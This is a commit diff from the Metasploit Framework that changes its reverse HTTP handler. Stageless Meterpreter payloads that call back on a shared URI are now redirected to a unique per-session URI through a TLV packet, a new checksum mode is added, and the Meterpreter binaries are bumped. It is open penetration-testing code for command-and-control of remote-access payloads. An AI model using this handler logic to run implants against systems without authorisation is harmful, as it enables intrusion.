Land rapid7#5141, stageless unique URIs with the same UUID

Author: Brent Cook

Gemfile.lock

@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (= 0.4.0)
       metasploit-model (~> 0.29.0)
-      meterpreter_bins (= 0.0.21)
+      meterpreter_bins (= 0.0.22)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -132,7 +132,7 @@ GEM
       pg
       railties (< 4.0.0)
       recog (~> 1.0)
-    meterpreter_bins (0.0.21)
+    meterpreter_bins (0.0.22)
     method_source (0.8.2)
     mime-types (1.25.1)
     mini_portile (0.6.2)

lib/msf/core/handler/reverse_http.rb

@@ -3,6 +3,7 @@
 require 'rex/sync/ref'
 require 'rex/payloads/meterpreter/patch'
 require 'rex/payloads/meterpreter/uri_checksum'
+require 'rex/post/meterpreter/packet'
 require 'rex/parser/x509_certificate'
 require 'msf/core/payload/windows/verify_ssl'
 
@@ -19,6 +20,7 @@ module ReverseHttp
   include Msf::Handler
   include Rex::Payloads::Meterpreter::UriChecksum
   include Msf::Payload::Windows::VerifySsl
+  include Rex::Post::Meterpreter
 
   #
   # Returns the string representation of the handler type
@@ -222,8 +224,6 @@ def on_request(cli, req, obj)
     uuid.arch      ||= obj.arch
     uuid.platform  ||= obj.platform
 
-    print_status "#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}... (UUID:#{uuid.to_s})"
-
     conn_id = nil
     if info[:mode] && info[:mode] != :connect
       conn_id = generate_uri_uuid(URI_CHECKSUM_CONN, uuid)
@@ -233,7 +233,25 @@ def on_request(cli, req, obj)
 
     # Process the requested resource.
     case info[:mode]
+      when :init_connect
+        print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Redirecting stageless connection ...")
+
+        # Handle the case where stageless payloads call in on the same URI when they
+        # first connect. From there, we tell them to callback on a connect URI that
+        # was generated on the fly. This means we form a new session for each.
+        sum = uri_checksum_lookup(:connect)
+        new_uri = generate_uri_uuid(sum, uuid) + '/'
+
+        # This bit is going to need to be validated by the Ruby/MSF masters as I
+        # am not sure that this is the best way to get a TLV packet out from this
+        # handler.
+        # Hurl a TLV back at the caller, and ignore the response
+        pkt = Packet.new(PACKET_TYPE_RESPONSE, 'core_patch_url')
+        pkt.add_tlv(TLV_TYPE_TRANS_URL, new_uri)
+        resp.body = pkt.to_r
+
       when :init_python
+        print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Python payload ...")
         url = payload_uri(req) + conn_id + '/'
 
         blob = ""
@@ -268,6 +286,7 @@ def on_request(cli, req, obj)
         })
 
       when :init_java
+        print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Java payload ...")
         url = payload_uri(req) + conn_id + "/\x00"
 
         blob = ""
@@ -296,9 +315,9 @@ def on_request(cli, req, obj)
         })
 
       when :init_native
+        print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Native payload ...")
         url = payload_uri(req) + conn_id + "/\x00"
 
-        print_status("#{cli.peerhost}:#{cli.peerport} Staging connection for target #{req.relative_resource} received...")
         resp['Content-Type'] = 'application/octet-stream'
 
         blob = obj.stage_payload
@@ -335,9 +354,10 @@ def on_request(cli, req, obj)
         })
 
       when :connect
+        print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Attaching orphaned/stageless session ...")
+
         resp.body = ""
         conn_id = req.relative_resource
-        print_status("Incoming orphaned or stageless session #{conn_id}, attaching...")
 
         # Short-circuit the payload's handle_connection processing for create_session
         create_session(cli, {

lib/msf/core/handler/reverse_http/stageless.rb

@@ -38,7 +38,10 @@ def generate_stageless(opts={})
     host = datastore['LHOST']
     host = "[#{host}]" if Rex::Socket.is_ipv6?(host)
     url = "http#{opts[:ssl] ? "s" : ""}://#{host}:#{datastore['LPORT']}"
-    url << "#{generate_uri_uuid_mode(:connect)}/"
+
+    # Use the init_connect mode because we're stageless. This will force
+    # MSF to generate a new URI when the first request is made.
+    url << "#{generate_uri_uuid_mode(:init_connect)}/"
 
     # invoke the given function to generate the architecture specific payload
     opts[:generator].call(url) do |dll|

lib/rex/payloads/meterpreter/uri_checksum.rb

@@ -10,18 +10,20 @@ module UriChecksum
         # Define 8-bit checksums for matching URLs
         # These are based on charset frequency
         #
-        URI_CHECKSUM_INITW = 92 # Windows
-        URI_CHECKSUM_INITN = 92 # Native (same as Windows)
-        URI_CHECKSUM_INITP = 80 # Python
-        URI_CHECKSUM_INITJ = 88 # Java
-        URI_CHECKSUM_CONN  = 98 # Existing session
+        URI_CHECKSUM_INITW      = 92 # Windows
+        URI_CHECKSUM_INITN      = 92 # Native (same as Windows)
+        URI_CHECKSUM_INITP      = 80 # Python
+        URI_CHECKSUM_INITJ      = 88 # Java
+        URI_CHECKSUM_CONN       = 98 # Existing session
+        URI_CHECKSUM_INIT_CONN  = 95 # New stageless session
 
         # Mapping between checksums and modes
         URI_CHECKSUM_MODES = Hash[
-          URI_CHECKSUM_INITN, :init_native,
-          URI_CHECKSUM_INITP, :init_python,
-          URI_CHECKSUM_INITJ, :init_java,
-          URI_CHECKSUM_CONN,  :connect
+          URI_CHECKSUM_INITN,      :init_native,
+          URI_CHECKSUM_INITP,      :init_python,
+          URI_CHECKSUM_INITJ,      :init_java,
+          URI_CHECKSUM_INIT_CONN,  :init_connect,
+          URI_CHECKSUM_CONN,       :connect
         ]
 
         URI_CHECKSUM_MIN_LEN = 5

metasploit-framework.gemspec

@@ -64,7 +64,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 0.29.0'
   # Needed for Meterpreter on Windows, soon others.
-  spec.add_runtime_dependency 'meterpreter_bins', '0.0.21'
+  spec.add_runtime_dependency 'meterpreter_bins', '0.0.22'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler